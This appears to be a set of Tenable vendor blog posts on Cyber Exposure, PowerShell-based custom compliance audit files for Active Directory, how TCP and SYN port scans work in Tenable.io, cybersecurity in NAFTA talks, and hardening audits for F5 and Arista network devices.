We are in the new, modern world of IoT, cloud, SaaS, mobile and DevOps, which means organizations need to approach understanding their cyber risk in a way that adapts to this new world of modern assets. For example, IoT and mobile devices may be undetectable with traditional tools, containers and cloud workloads which, as opposed to other types of assets that have lives of months to years, may have a life of minutes to hours, making them extremely hard to see and protect. There are also safety-critical infrastructure and Operational Technology like Industrial Control Systems which are a rising attack vector. These systems were designed to be walled off from the network and isolated from threats, and therefore not designed for frequent change or software deployments. As software permeates through every industry, these Industrial IoT devices which are now connected devices need to be protected but the old way is too intrusive.

Welcome to the Era of Modern Cyber Exposure

We believe that Cyber Exposure is the next frontier for empowering organizations to accurately understand, represent and ultimately reduce their cyber risk against the rapidly changing modern attack surface. Cyber Exposure transforms security from a static or fragmented view to live and holistic visibility across every asset - whether that’s IoT or traditional IT devices, cloud infrastructure or Industrial Control Systems. From this live picture then you can start to accurately assess and analyze these assets for areas of exposure. This could be misconfigurations but it could also be other hygiene types of health indicators such as out-of-date antivirus or flagging high-risk users. By correlating this information with additional sources data, such as a CMDB or threat intelligence, you can get a more complete picture of the business criticality and severity of the issue to prioritize remediation and work with IT to fix it.

Cyber Exposure is analogous to IT Service Management and how the execution of ITSM processes is supported with specialized software technology. At the core of ITSM software suites are a workflow management system (service desk) for managing incidents and maintaining a knowledge base system of record, and a Configuration Management Database (CMDB) for discovering and mapping Configuration Items and their dependencies. Bringing these technologies together creates an intuitive way to link incidents with change and service requests together, but also provides a view of business services and the underlying IT infrastructure to help accelerate troubleshooting and change impact analysis, for example. Just as ITSM provides a process for planning, delivering and operating IT services to better support customers, Cyber Exposure provides a discipline and a process for managing and measuring cyber risk against the modern attack surface. This will help security and IT teams collaborate to more effectively and efficiently identify and resolve issues, but will also provide an objective way for the CISO, CIO and the business to measure cyber risk and use it for strategic decisions and planning. Cyber Exposure technologies will provide the data, visualization, process management and metrics to help drive a new way to manage security to reduce risk, make better business decisions and actually enable digital transformation instead of being the impediment to it.

Communicating Cyber Risk to the Board

There has also been a lot of conversation around cybersecurity awareness and readiness within the C-suite and the board of directors: how do you represent and communicate cyber risk in non-technical, business terms? Today the CISO has to translate a mountain of data in multiple spreadsheets into intuitive insights the business can use to make decisions from. Cyber Exposure will help the CISO drive a new level of dialogue with the business. If you know which areas of your business are secure - or exposed - and you can measure your organization against a larger set of data. This opens up a whole new set of discussions and decisions about where the organization needs to focus, how much and where to invest to reduce risk to an acceptable amount and help drive strategic business decisions. Every function has its organizational system of record to manage, measure and predict the business exposure relevant to that function, for example, CRM for revenue and forecasting exposure, ERP for financial and supply chain exposure and Human Capital Management (HCM) for employee satisfaction and attrition exposure. Imagine a future where every strategic business decision factors in Cyber Exposure data as a key risk metric, just as the business does with all of these types of exposure. We believe the future doesn’t need to be in the future.

We’re excited to apply our years of expertise and knowledge in understanding assets, networks and vulnerabilities to usher in this new modern era of Cyber Exposure. And we’re just getting started...

Having a background as a system administrator, I know first-hand many of the challenges you face. As every organization has a unique set of business requirements, system administrators work hard behind the scenes to keep operations running smoothly. From managing permission changes, recovering important files and monitoring user accounts, many system administrators utilize scripts to automate and manage routine tasks. Tenable.io includes over 450 pre-built audit policies and allows you to incorporate custom audit files. Custom audit files provide a great way for you to monitor routine events and changes, while making your work a little easier.

The Problem

On a daily basis, organizations can generate thousands of events, and keeping track of these events across multiple systems can be difficult to manage effectively. System administrators often access multiple web interfaces or consoles to manage systems within their environment. In addition, many are also responsible for maintaining compliance, managing access permissions, and ensuring corporate policies are followed.

Scripts are often used in combination with other security devices to help system administrators monitor critical events or issues that need to be addressed. Unfortunately, no matter what you use to monitor your network, many of these solutions won’t provide the complete visibility you need to sort through all of the events and activity within your network.

By leveraging custom audit files within Tenable.io, you can easily keep track of unique or critical events within one interface. You can customize scripts based on your organizational requirements that can help to ensure service availability and protect data integrity. Tenable.io provides you with the critical insight needed to stay one step ahead of activity that could impact network security or business operations.

Monitoring Account Changes

Many organizations today are required to ensure compliance with corporate policies, as well as industry regulations. Controls requiring password changes and monitoring inactive accounts are often included within many well-known frameworks such as NIST, HIPAA, and PCI DSS.

We have also recently had several questions from customers that wanted to monitor user account changes within Active Directory. I decided to use my lab environment and test out a solution. Within my lab environment, I created several PowerShell scripts to find inactive user accounts and password changes within the domain. These controls help to prevent account compromise and reduce the risk of critical systems or data from being accessed by attackers.

Using Powershell with Tenable.io

Tenable.io has the ability to run compliance checks using PowerShell cmdlets. The compliance checks use the arguments supplied within a custom audit file and run “powershell.exe” on the remote server. Results will include either the command output or compare results against the value data specified in the file. PowerShell is Microsoft’s built-in scripting language that’s designed for System Administration tasks. Using credentialed scans, Tenable.io leverages PowerShell scripts placed within custom audit files to collect information on event changes and activity within your network.

Monitor User Accounts

Since I’m going to be querying Active Directory, I start by importing the Active Directory Module for PowerShell. The Get-ADUser cmdlet I created a script to retrieve a list of user accounts and when the password was last set. Using this cmdlet, you modify the script to include either active and inactive accounts, and track changes across specific Organizational Units (OU) or other domains within your forest.

This information can also be used by executives to confirm if corporate security policies are being followed or need to be improved. If your organization has an internal policy to remove inactive accounts after a specific time period, using this data can help you ensure compliance requirements are being met.

Tenable.io also supports the ability to use PowerShell script files within your custom audit file. The Nessus User Guide includes a detailed section on how to setup and configure your custom audit file with Powershell.

Create Custom Audit File

In my custom audit file, I’m using if/then logic to first check whether the target system is a domain controller, then runs each audit check. Since I’m going to audit my domain controller, the WMI_POLICY is used to provide an initial check that target system is either a Primary or Backup domain controller.

<custom_item>
  type          : WMI_POLICY
  description   : "Target is a Domain Controller"
  wmi_namespace : "root/CIMV2"
  wmi_request   : "select DomainRole from Win32_ComputerSystem"
  wmi_attribute : "DomainRole"
  wmi_key       : "DomainRole"
  value_type    : POLICY_DWORD
  value_data    : 4 || 5</custom_item>

Next, I used the AUDIT_POWERSHELL check and added the PowerShell commands I ran previously. The description value should include the appropriate plugin name and powershell_args value should contain the PowerShell command. This check also supports the ability to use PowerShell .ps1 files as well.

<custom_item>
  type                 : AUDIT_POWERSHELL
  description          : "<Plugin Name>"
  value_type           : POLICY_TEXT
  powershell_args      : "<PowerShell command>"
  value_data           : "MANUAL REVIEW REQUIRED"
  severity             : MEDIUM
  only_show_cmd_output : YES</custom_item>

The Compliance check parser provides you with the ability to add multiple audit checks within your custom audit file. Once your custom audit file is completed, save the final output into an .audit format.

Results

Using the Policy Compliance Auditing scan template, I added my custom audit file and credentials for the domain controller. Completed results are located under the Compliance tab within the scan, and included the name of each check performed. Since we are auditing a Windows System, results are included within the Windows Compliance Checks plugin family.

Each result will look identical to the results posted earlier within PowerShell command line sessions. If you need to add more information, you can always modify your custom audit file to include the specific attributes you need based on your organizational requirements.

Summary

User accounts are one of the easiest ways for attackers to gain access to your network systems and data. Once an account is compromised, attackers can pivot and target critical systems, obtain confidential data, and remain in your network for days, weeks or even month.

These examples are just a small portion of what custom audit files can do for you. Whether you want to obtain additional information from Active Directory, monitor file and folder changes or track local account activity, using custom audit files provides you with countless ways to automate routine tasks and know what’s going on within your network.

I hope these tips help. And Happy SysAdmin Day to my fellow fearless colleagues!

Have More Questions?

• Try out a free 60-day trial of Tenable.io Vulnerability Management.
• For a detailed example of how to create custom audit files, check out this post in the Tenable Community.

As a summer intern for the research and development department at Tenable, I was surprised when my manager gave me a relatively straightforward first task: find every machine in the lab. I knew that some form of port scan was needed. Maybe I could start with a ping sweep of some IP range, or maybe something more comprehensive. But my manager also added some nuance to the project. I had to put myself in the shoes of a Tenable customer, and my objective was to present a plan to discover machines and to identify the Cyber Exposure risk on the lab network using Tenable.io. The first step was to define the network subnets, and then I had to scan the networks for vulnerabilities.

TCP Handshaking

TCP and SYN are two methods that stem from the concept of TCP handshaking. When two computers communicate over TCP/IP, flags are set on the TCP layer of a packet. A TCP flag is a series of bits that indicates how a packet should be handled by the server. Some important flags to remember are SYN (synchronize), ACK (acknowledge), RST (reset), FIN (no more data to send). In TCP handshaking, one computer sends a packet with the SYN flag, initiating the connection to the server. The server responds with a packet with SYN and ACK flags set, as if to acknowledge the request from the first computer to connect. If the connection is refused due to a closed port, the server responds with an RST packet. In response to the SYN/ACK packet, the first computer acknowledges with an ACK packet, completing the TCP connection. When the conversation is over, a FIN packet is sent, acknowledging the end of the conversation. We can leverage this information to understand what ports are open on a computer.

TCP Scanning vs SYN Scanning

The handshaking method is a simple way to see whether a port is open on a computer. If the connection with the target machine is completed, then the port is open. If not, then the port is either closed or the packets are being filtered by a firewall. Depending on the firewall configurations, the scanner may receive an error message or no response at all. This method is aptly named TCP Scanning.

An SYN scan works under the assumption that if a computer receives an SYN/ACK packet from a target, then that port is open, because otherwise the scanning computer would have received an RST packet. So, if a port responds to an initial SYN packet with an SYN/ACK packet, the scanning computer sends an RST packet and moves to the next port. If the target computer responds to the initial SYN packet with an RST packet, then the port is closed. This scan is often called “stealthy.” However,  “stealthy” is a relative term in this case, namely because the scanner never completes a TCP connection. However, if a wide port range is probed, the scanner’s IP address will stand out on the network traffic logs. Further, most modern Intrusion Detection Systems (IDS) and firewalls can detect an SYN Scan.

Credentialed vs. Uncredentialed Scans

Uncredentialed network scanning allows an analyst to gather information regarding running services and their respective locations. In practice, port scanning gives you insight into what an attacker can find out about your network without having credentialed access. This information could help you pinpoint weaknesses in your systems by identifying factors such as outdated services, open and commonly vulnerable ports. Tenable.io offers three types of port scanning: TCP, SYN, and UDP. UDP scanning is rarely used due to the fundamental inaccuracy and speed constraints of the scanning method.

How to Execute TCP, SYN, and UDP Scans

Tenable.io’s scan policy templates can be configured to scan some or all ports. For example, the Host Discovery Scan template is very useful for identifying assets on your network. You can select “Port scan” under the Basic section of the scan settings. By default, the Host Discovery port scanner utilizes the TCP scan technique, employing an SYN scan if the TCP scan attempts are blocked by a firewall.

However, If you want to configure the scan yourself, select the “Custom” option in the “Scan Type” field.

Then go to “Port Scanning” and scroll down to the “Network Port Scanners” section. There you can choose any or all of the TCP, SYN and UDP port scanners.

For the TCP and SYN port scanners, you also have the option to override some of the firewall detection features (firewall detection performed with Nessus Plugin ID: 27576). “Aggressive detection” runs plugins even if a port appears to be closed. “Soft detection” disables the ability to determine if a downstream network device has set a limitation of the rate at which resets are sent. Finally, “Disable detection” disables the firewall detection feature entirely.

Scanning More Than Just Ports

Port scanning can serve as a good starting point to understand and measure your Cyber Exposure, but external scans are just one part of understanding your organization’s Cyber Exposure. Once an uncredentialed network scan has been completed, you can continue with a more fine-tuned, credentialed scan.

You can input credentials manually, upload a file, or even have Tenable.io brute force default/weak credentials in the “Brute Force” section of “Settings” in an Advanced Scan Policy. An uncredentialed scan may demonstrate what your network looks like from the outside, but it is equally, if not more, important to take a look on the inside. Credentialed scans allow you to audit specific applications, evaluate program checksums against Tenable’s malware database, search through the file system of a computer and even scan individual file contents.

So, What Did I learn?

By scanning the lab, not only did I become more familiar with the Tenable.io platform, but I also learned the value of timing in vulnerability analysis. Scanning is not just about getting the information you need, it’s about getting that information as efficiently and effectively as possible.

Learning how to prioritize and map out your scans is essential to successfully managing, measuring and reducing your organization’s Cyber Exposure. With the expansion of IoT and container technology, attack surfaces are only growing, making this skill even more critical.

Tenable.io provides visibility into any asset on any computing platform and allows you to schedule scans on a regular basis, ensuring you always have the most useful, up-to-date information. Start a free 60-day trial of Tenable.io for your organization today.

Cybersecurity is a major global economic force, with spending estimated to reach more than $100 billion by 2018, and more than $170 billion by 2020. North America has the largest cybersecurity market in the world, and the United States accounts for the biggest portion, making the industry an important source of well-paying, high-value jobs.

Digital security is critical to every industry, from healthcare and finance to manufacturing and agriculture. But the nature of today’s global networks means that cyberattacks do not stop at national borders. Security lapses abroad can cause catastrophic harm to U.S. businesses, our critical infrastructure and economy. To increase both economic and national security, it’s imperative that U.S. cybersecurity companies continue to innovate both at home and abroad. 

Later this week, the federal government has an opportunity to help better protect U.S. businesses by conveying the U.S. priority on establishing international cybersecurity norms as part of the renegotiation of the North American Free Trade Agreement (NAFTA). Secure computing has become paramount in the global digital economy. We must modernize our trade agreements to incorporate cybersecurity cooperation, and cooperation with our closest neighbors through NAFTA is a good place to start.

Cybersecurity Cooperation 

That’s why Tenable joined fellow cybersecurity industry leaders in writing a letter to United States Trade Representative (USTR) Robert Lighthizer and Secretary of Commerce Wilbur Ross, urging the inclusion of cybersecurity cooperation in renegotiation efforts. While the inclusion of digital goods and services was included in the recently-released negotiating objectives, a robust discussion of how to work toward global cybersecurity standards and global norms would serve all parties’ collective interests.

There is widespread agreement, even among industry competitors, on the value of international cybersecurity standards. Among other benefits, these standards seek to discourage the use of cybersecurity-related trade barriers, such as data localization, and provide greater security to U.S. businesses by raising the baseline cybersecurity level of trading partners.

One of the most effective ways to protect our nation from cybercriminals is to make cybersecurity an economic priority and a trade incentive as part of all trade agreement negotiations.

Risk Management & Encryption 

In our letter, we also urged USTR to promote voluntary cyber risk management frameworks, like the National Institute of Standards and Technology (NIST) Cybersecurity Framework, among the parties involved in NAFTA. The NIST Framework has met widespread adoption among the private and public sector in the U.S. due to its flexible, voluntary standards and the fact that it was developed in a transparent, multi-stakeholder process. Alignment around this kind of framework would be equally valuable among North American trade partners.

Encryption also plays an important role in establishing international cybersecurity standards. As part of the renegotiation efforts, NAFTA should prohibit governments from requiring access to encryption keys and source code as a condition for market access.

Reframing Cybersecurity's Role

In today’s digital world, every company is a technology company. We can’t afford to overlook the importance of making cybersecurity a critical component of daily business, both in the U.S. and overseas. I believe this starts by reimagining and reframing cybersecurity’s role in international trade agreements. If our governments can work together to make it harder for cyber adversaries to succeed, we all benefit.

In a recent blog post, Ted Gary discussed results from a Tenable survey about configuration hardening at the system level. In short, organizations are making progress on enforcing and auditing their desktops and servers for secure configurations, but there is still a lot of work to do. While the whole realm of network devices was beyond the scope of the survey, it obviously can’t be beyond that of your hardening efforts.

Background

Many of the standard frameworks use an umbrella approach for recommending configuration baselines and treat all devices and endpoints equally:

NIST Cybersecurity Framework

PR.IP-1 - A baseline configuration of information technology/industrial control systems is created and maintained.

NIST 800-53 rev 4

CM-2 - Baseline Configuration CM-2(1) - Reviews and Updates

ITSG-33 (Canada)

CM-2 - Baseline Configuration
CM-2(1) - Reviews and Updates
CM-2(2) - Automation Support for Accuracy/ Currency

Some frameworks and standards, like the Center for Internet Security (CIS) Controls and Payment Card Industry Data Security Standard (PCI-DSS), see the management of the network itself as important enough to justify its own sections and recommendations, in addition to their general system requirements.

CIS Controls

11 - Secure Configurations for Network Devices

PCI-DSS

1.1 – Establish and implement firewall and router configuration standards.
1.1.7.a – Verify that firewall and router configuration standards require review.
2.2 - Develop configuration standards for all system components.

The central theme of all of these recommendations across the various frameworks is fundamentally a threefold process.

1. Design and implement a secure hardened baseline across the devices in your organization.
2. Monitor and validate that the baseline has been implemented and drift doesn’t occur.
3. Periodically review the baseline and update it according to new threats and the ever-evolving environment.

Some of the best starting places for building the secure baseline for a number of devices are either the CIS Benchmarks or the Defense Information Systems Agency (DISA) Secure Technical Implementation Guides(STIG). These resources provide technical hardening recommendations for many popular and widely implemented devices.

If a particular device in your environment is not covered by a CIS Benchmark or DISA STIG all hope is not lost. Most vendors provide their own stand-alone hardening guides. For example, Juniper Networks published their own guide, “Hardening Junos Devices”. Much like in the desktop and server environment, there’s a chance that none of the recommendations are going to be a perfect fit out-of-the-box for all environments. If that’s the case, there might be a need to tailor one or a combination of several in order to get a complete baseline. The important lesson here is that multiple resources exist to help you build the initial baselines and avoid having to start with a blank slate.

Tenable Solutions

Tenable's secure configuration auditing solutions provide a number of audit files for network devices. Right alongside your regular vulnerability scanning you can test and validate the configuration baselines you defined for the organization. These audit files cover a wide range of devices from Cisco and Juniper to Palo Alto Networks and Huawei. Any of these devices can be evaluated for a number of different configuration parameters and generally have multiple audit files available.

Most of the audit files are built according to the CIS Benchmark or DISA STIG recommendations, and in general, overlap quite a bit. For example, testing DNS and NTP server settings, validating whether specific services or protocols are enabled and/or configured correctly, and checking that accounts and authentication are setup properly for local and remote management are all included in both standards and have checks in Tenable audit files.

If your organization requires a hybrid or tailored version of one of the benchmark documents, a completely custom audit file can be created or, in many cases, one of the standard files can be customized by adding/removing checks or modifying acceptable values.

Recent Additions (F5 and Arista Devices)

Recently, Tenable has added support for additional network devices, specifically F5 BigIP and Arista MLS devices.

Our support for F5 covers a number of its technologies from the Advanced Firewall Manager and Application Security Manager to Device and Local Traffic Management.

Alongside these new plugins are accompanying audits based on the DIS STIG guidance that has been released. A full list of available DISA STIG documents is available from the DISA Information Assurance Support Environment (IASE) homepage.

Scans of F5 devices are very similar to many of the existing network device scans. F5 scans can be initiated from both the Advanced Scan or Policy Compliance templates. Inside either of those templates should be a new entry for the F5 credentials under Miscellaneous in the credentials tab.

Under the Compliance tab, you should also see a new entry for F5 which allows both the upload of custom audit files in addition to the list of audit files Tenable has released.

Like F5 devices, online Arista scans can be initiated from both the Advanced scan and Policy Compliance templates. For online scans, an SSH login is required and the credentials are stored just like any other SSH login. A new Arista section contains the custom audit upload along with the list of Tenable provided audits.

Offline Audit Support

Arista devices can also be audited in offline mode which is often convenient for validating backed-up configurations or testing a baseline configuration before it's rolled out. Offline scans are configured via the Offline Configuration Audit template.

An offline scan doesn’t require any credentials, so an SSH login is unnecessary. Setting up the audit only requires you to select an audit file or upload your custom audit and then add the configuration file you would like to be evaluated on the Compliance tab.

Wrap-Up

When planning the baseline hardening for network devices, it’s important to keep in mind that, in most cases, issues with devices such as firewalls, routers and load balancers, will ripple across the environment. A device’s configurations aren’t limited to providing its own services and protecting itself, but they also play a significant role in most organizations’ layered security practices. A compromised firewall doesn’t just mean it isn’t filtering and passing traffic, it might also be putting other devices at risk to threats they are unable or not configured to handle.

How Tenable Can Help

Tenable products offer a wide range of audit files for most popular network device platforms like Cisco, Juniper and Huawei, along with the addition of F5 and Arista. Many of these can be conducted both online against running systems and in offline mode against an exported configuration file. This offline support often proves very handy in developing a secure baseline since changes can be tested and the results are available immediately against your chosen audit file.